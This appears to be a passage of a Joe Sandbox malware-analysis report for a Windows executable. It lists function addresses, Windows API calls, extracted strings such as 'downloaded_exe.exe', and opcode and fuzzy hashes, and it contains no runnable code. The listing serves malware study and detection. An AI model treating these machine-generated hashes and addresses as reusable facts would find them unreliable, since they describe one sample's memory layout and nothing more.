Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CurrentThreadfprintf
String ID: C%p %lu %s$C%p %lu V=%0X w=%ld %s
API String ID: 1384477639-1941858864
Opcode ID: 6efe491e5fa760b90e93acd3bacb9444f24e84bc8d09a2af6763f3bafdf0cb06
Instruction ID: c0c1089db467afa41240041811eaa516753592f1e4f53e40906861a88da63567
Opcode Fuzzy Hash: 6efe491e5fa760b90e93acd3bacb9444f24e84bc8d09a2af6763f3bafdf0cb06
Instruction Fuzzy Hash: FC015B77A0970585EB11EB29E8014ACB764BBC8BE4F848131DF1C53390EE7CE496C6B2

Function 00007FF7FE90F490 Relevance: 10.5, APIs: 7, Instructions: 44COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7FE90F4B8
OpenProcess.KERNEL32 ref: 00007FF7FE90F4CF
CloseHandle.KERNEL32 ref: 00007FF7FE90F4DD
_errno.MSVCRT ref: 00007FF7FE90F4F8

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen_errno
String ID:
API String ID: 2250453136-0
Opcode ID: 6d3c97220c4db31a878e0c06f64b5d53017a521f1e61b5e2ec0c74c05891a679
Instruction ID: ce1d029005b3f7f4841e69e6682372ee4386f7d0c3ba5bc590baf7e680daa349
Opcode Fuzzy Hash: 6d3c97220c4db31a878e0c06f64b5d53017a521f1e61b5e2ec0c74c05891a679
Instruction Fuzzy Hash: 91010865A0D61782FB65FF60AC88238B154AFD8B21FD44434CF2E023D1DE6D298982B3

Function 00007FF7FE90D3D0 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7FE90D3E6
GetProcessAffinityMask.KERNEL32 ref: 00007FF7FE90D3F9
GetCurrentProcess.KERNEL32 ref: 00007FF7FE90D47F
GetProcessAffinityMask.KERNEL32 ref: 00007FF7FE90D48F
GetCurrentProcess.KERNEL32 ref: 00007FF7FE90D4D0
SetProcessAffinityMask.KERNEL32 ref: 00007FF7FE90D4D9

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 88d5b8ed5832d87e30ebd0ca70565a11d6d1b0f2475f624a9e7c710420d795ec
Instruction ID: b5e4df684bf209e714a045b4fcacc87ad32ddd4cfeffe57cd578d6e736e7a153
Opcode Fuzzy Hash: 88d5b8ed5832d87e30ebd0ca70565a11d6d1b0f2475f624a9e7c710420d795ec
Instruction Fuzzy Hash: 88318122B08B4686EF50EB69A840379B791ABC4794FC85034EF1E437D4EE3CE44582B2

Function 00007FF7FE90CEB0 Relevance: 9.1, APIs: 6, Instructions: 97sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FE90CB70: TlsAlloc.KERNEL32 ref: 00007FF7FE90CBAD

TlsSetValue.KERNEL32 ref: 00007FF7FE90CEEE
GetCurrentThreadId.KERNEL32 ref: 00007FF7FE90CEF4
CloseHandle.KERNEL32 ref: 00007FF7FE90CF96
Sleep.KERNEL32 ref: 00007FF7FE90CFE8
_endthreadex.MSVCRT ref: 00007FF7FE90D00D
TlsSetValue.KERNEL32 ref: 00007FF7FE90D03E

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Value$AllocCloseCurrentHandleSleepThread_endthreadex
String ID:
API String ID: 3976303954-0
Opcode ID: bc27740c422680bd4745455aa61c2f101f7b75c5aa70ef14c32ee4bb6922aae5
Instruction ID: e2bfc520dc159e908af3e55a2ebb9b0951f302702a254af0cb5de8703aa6945c
Opcode Fuzzy Hash: bc27740c422680bd4745455aa61c2f101f7b75c5aa70ef14c32ee4bb6922aae5
Instruction Fuzzy Hash: F141B365A08B4686EB14FF36D8502A9A360EFC4B94FC44931DA2E473E5DE38E54183B3

Function 00007FF7FE900640 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

_write.MSVCRT ref: 00007FF7FE900656
IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7FE8F318D), ref: 00007FF7FE900660
GetCurrentProcess.KERNEL32 ref: 00007FF7FE900670
TerminateProcess.KERNEL32 ref: 00007FF7FE90067E

Strings

*** buffer overflow detected ***: terminated, xrefs: 00007FF7FE90064F

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_write
String ID: *** buffer overflow detected ***: terminated
API String ID: 483568592-381091186
Opcode ID: f3127bb19db2d1cfb262a91e405b50927496c79e38a4e1187ac09b5922eb3eef
Instruction ID: 7152b0755a15a7b4cb741050c9be27f359332aa904d7cd6465d7ec1c381166f6
Opcode Fuzzy Hash: f3127bb19db2d1cfb262a91e405b50927496c79e38a4e1187ac09b5922eb3eef
Instruction Fuzzy Hash: DFE0EC50B0820282FB04F761A81537951626FC6745FE04435C71E062E6EE5C980643F3

Function 00007FF7FE903920 Relevance: 7.9, APIs: 5, Instructions: 393COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00007FF7FE903ADA
fputc.MSVCRT ref: 00007FF7FE903B32

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: fputc
String ID:
API String ID: 1992160199-0
Opcode ID: 3430c81c00520418abbd2e26400e62450af90a2bca0ed6dcf9b96ec4e608ef44
Instruction ID: 710b8b8535947eb32cbd70168829d797ea1bd2cb5d2ee6acfdcd50e8282eb0c8
Opcode Fuzzy Hash: 3430c81c00520418abbd2e26400e62450af90a2bca0ed6dcf9b96ec4e608ef44
Instruction Fuzzy Hash: CFE1E762F1829186E765EE359404739AB91BB94B68FD48238CF3D577C4CA3CE841C7B2

Function 00007FF7FE8FCF50 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

{default arg#, xrefs: 00007FF7FE8FD1D0
}::, xrefs: 00007FF7FE8FD32A
?, xrefs: 00007FF7FE8FCF65
], xrefs: 00007FF7FE8FD49A

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: ?$]${default arg#$}::
API String ID: 0-2946519879
Opcode ID: 0cfe819ff77efa2c87094a5a727c7a95add88d041fc0f90f53692db4244a2ce9
Instruction ID: d6c98432f210f1845fc405438bbbd60d16dd8a748596d18128348366644fb601
Opcode Fuzzy Hash: 0cfe819ff77efa2c87094a5a727c7a95add88d041fc0f90f53692db4244a2ce9
Instruction Fuzzy Hash: C2E1A6726086C186E715AF25E4003FAE791EBA5748F985031CBBA073D5DF7DE4A1D3A0

Function 00007FF7FE923210 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 200stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE92325F
memcpy.MSVCRT ref: 00007FF7FE9232D8
wcslen.MSVCRT ref: 00007FF7FE923363

Strings

basic_string: construction from null is not valid, xrefs: 00007FF7FE923307, 00007FF7FE9233A6, 00007FF7FE923446

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memcpystrlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 339887217-2991274800
Opcode ID: f62cde7252a470c6f1d58ac04b23de286cafcc62545e41ead13a0f10dfb11e35
Instruction ID: 7332049fd62cc9784108b8cb4e2511018cac3ef6a156fcac238eae73f4def7b5
Opcode Fuzzy Hash: f62cde7252a470c6f1d58ac04b23de286cafcc62545e41ead13a0f10dfb11e35
Instruction Fuzzy Hash: 6E517A22A19B4694EF21EF2AE4400ADA760BB88FC4BC54576DE6C077E4DE2CE551C3B1

Function 00007FF7FE90BF00 Relevance: 7.6, APIs: 5, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: 81dc990f7d275baa3f2e5cee8ee76a5c54e5f638d7819fde445d5832f20a7820
Instruction ID: 2dec3fb6ebce9d0ab194676e44141e92186445b4e27f878a83b48725127e6530
Opcode Fuzzy Hash: 81dc990f7d275baa3f2e5cee8ee76a5c54e5f638d7819fde445d5832f20a7820
Instruction Fuzzy Hash: 30415322B0950246FF65FE359900379A191AF84B54FD88535DB2E8B2C4FE6CE8C187B2

Function 00007FF7FE8F3AA5 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 108stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE8F3B48

Strings

_, xrefs: 00007FF7FE8F3AC7
b, xrefs: 00007FF7FE8F3AB7
x, xrefs: 00007FF7FE8F3AC1

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlen
String ID: _$b$x
API String ID: 39653677-3075772552
Opcode ID: a7c274c2924137de79d52dcdeb66335f931175f95cafb1ac8ca79f7d841119ee
Instruction ID: f7d44dd2a7af8647bb3f1f3171869dcbae6340464e0708cc90a490587c1e6dff
Opcode Fuzzy Hash: a7c274c2924137de79d52dcdeb66335f931175f95cafb1ac8ca79f7d841119ee
Instruction Fuzzy Hash: 4041DF73E09A4286E750EF29D541169B3A1FBA4794FA05032CB6C833C5EF3CE5A0C7A0

Function 00007FF7FE90A790 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7FE90A7A6
ReleaseSemaphore.KERNEL32 ref: 00007FF7FE90A7D4
LeaveCriticalSection.KERNEL32 ref: 00007FF7FE90A7E1
LeaveCriticalSection.KERNEL32 ref: 00007FF7FE90A7FB
LeaveCriticalSection.KERNEL32 ref: 00007FF7FE90A818

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CriticalSection$Leave$EnterReleaseSemaphore
String ID:
API String ID: 2813224205-0
Opcode ID: e9702580d07d0a128db231bccbbb01f030f06a7c3e485f653b1b989b9a50be0d
Instruction ID: a0e08745cfa4741d1889c4db857280a2ed963a283921efc4617016ea5d4400c5
Opcode Fuzzy Hash: e9702580d07d0a128db231bccbbb01f030f06a7c3e485f653b1b989b9a50be0d
Instruction Fuzzy Hash: 3E019B33F0961646FB159F2AAD8037892556FD9BF1F888530CF2E416C0ED6C94C68271

Function 00007FF7FE916E00 Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00007FF7FE916E1E
strlen.MSVCRT ref: 00007FF7FE916E29
memcpy.MSVCRT ref: 00007FF7FE916E46
setlocale.MSVCRT ref: 00007FF7FE916E51
setlocale.MSVCRT ref: 00007FF7FE916E74

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 19fd47368449de3893161ae5d1d46a2c8356da61df5f60124c24fe22ad647fe6
Instruction ID: ad30030ed5a6dc2f191f33cda92a1b1026a9fed6207b93a2cee9d03cc6b1b72e
Opcode Fuzzy Hash: 19fd47368449de3893161ae5d1d46a2c8356da61df5f60124c24fe22ad647fe6
Instruction Fuzzy Hash: B5018413B0929214EB29FB776D058BE81512F8AFD4FC48035AE2D5B7C6DD7CD54243A1

Function 00007FF7FE90AE60 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000086,000000AE,?,00007FF7FE9ED210,00007FF7FE90B641), ref: 00007FF7FE90AE86
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FE9ED210), ref: 00007FF7FE90AEAB
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FE9ED210), ref: 00007FF7FE90AEDB
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7FE9ED210), ref: 00007FF7FE90AEE5

Strings

downloaded_exe.exe, xrefs: 00007FF7FE90AE60, 00007FF7FE90AE6B

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: downloaded_exe.exe
API String ID: 3168844106-1849240386
Opcode ID: 7a635ea1d546c716ca980fc5455481521dc05f4b8042dcda419aed9a15e0e74a
Instruction ID: ef9fa0eca79fe1b070e8a653ed4cd4bd30ae98cbc39d1be3210fd8f867ea57f7
Opcode Fuzzy Hash: 7a635ea1d546c716ca980fc5455481521dc05f4b8042dcda419aed9a15e0e74a
Instruction Fuzzy Hash: C5017C33B0965655EA15EB376C0066AA250BFC8BE4FD90031EE1E07791DD7CD88287E1

Function 00007FF7FE90F420 Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7FE90F438
OpenProcess.KERNEL32 ref: 00007FF7FE90F44F
CloseHandle.KERNEL32 ref: 00007FF7FE90F45D

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Process$CloseCurrentHandleOpen
String ID:
API String ID: 2750122171-0
Opcode ID: ca14f657cd2fa31a0244ba232d5140340bf2434b90f2e77fec50ea2ac159660c
Instruction ID: 6ae2e92eead991efa9ce20bb3f65ec308cd4e9926c57c22fc723cd751f874fe9
Opcode Fuzzy Hash: ca14f657cd2fa31a0244ba232d5140340bf2434b90f2e77fec50ea2ac159660c
Instruction Fuzzy Hash: 9EF0A461E1DA0282FF65AB719858239B1A09F98B21FD44534CF2A453D0EE6C658542B3

Function 00007FF7FE8FEDE0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 240memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00007FF7FE9ED0B0,00007FF7FE9ED0B8,00000000,?,?,?,?,?,00007FF7FE8F1254,?,?,?,00007FF7FE8F1426), ref: 00007FF7FE8FEFBD

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF7FE8FF114
Unknown pseudo relocation protocol version %d., xrefs: 00007FF7FE8FF136
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7FE8FF12A

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 544645111-1286557213
Opcode ID: 33b81cf04197788bd0ebfac253a00323cdc16df1d3d9c5ad658ce48fc9041f0c
Instruction ID: a9e281dd8eb7a1de2269856012b82f5382b370d620b35ed9e9b344c5bcb14d60
Opcode Fuzzy Hash: 33b81cf04197788bd0ebfac253a00323cdc16df1d3d9c5ad658ce48fc9041f0c
Instruction Fuzzy Hash: 5791B422E2959386EB10BB24D840279A251AFE4774FD4A231DA3D177D8DF2CE86186F1

Function 00007FF7FE8FF196 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

CCG , xrefs: 00007FF7FE8FF1B5

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: ff268d5b63e3c0495616c1b78d4c75a0849a145f646b235b978ee35320683902
Instruction ID: d4d22240e87fb184b4dbc4e697999992ea4c352e9e994281f86ed2bdcc54c975
Opcode Fuzzy Hash: ff268d5b63e3c0495616c1b78d4c75a0849a145f646b235b978ee35320683902
Instruction Fuzzy Hash: 7F21D366E2D1830AFF68B364808037991819FF9354F986535CA3D873D6CE6CA8F142B6

Function 00007FF7FE90C740 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7FE90C79A
OutputDebugStringA.KERNEL32 ref: 00007FF7FE90C7BA
abort.MSVCRT ref: 00007FF7FE90C7C0

Strings

Error cleaning up spin_keys for thread %lu., xrefs: 00007FF7FE90C7A0

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

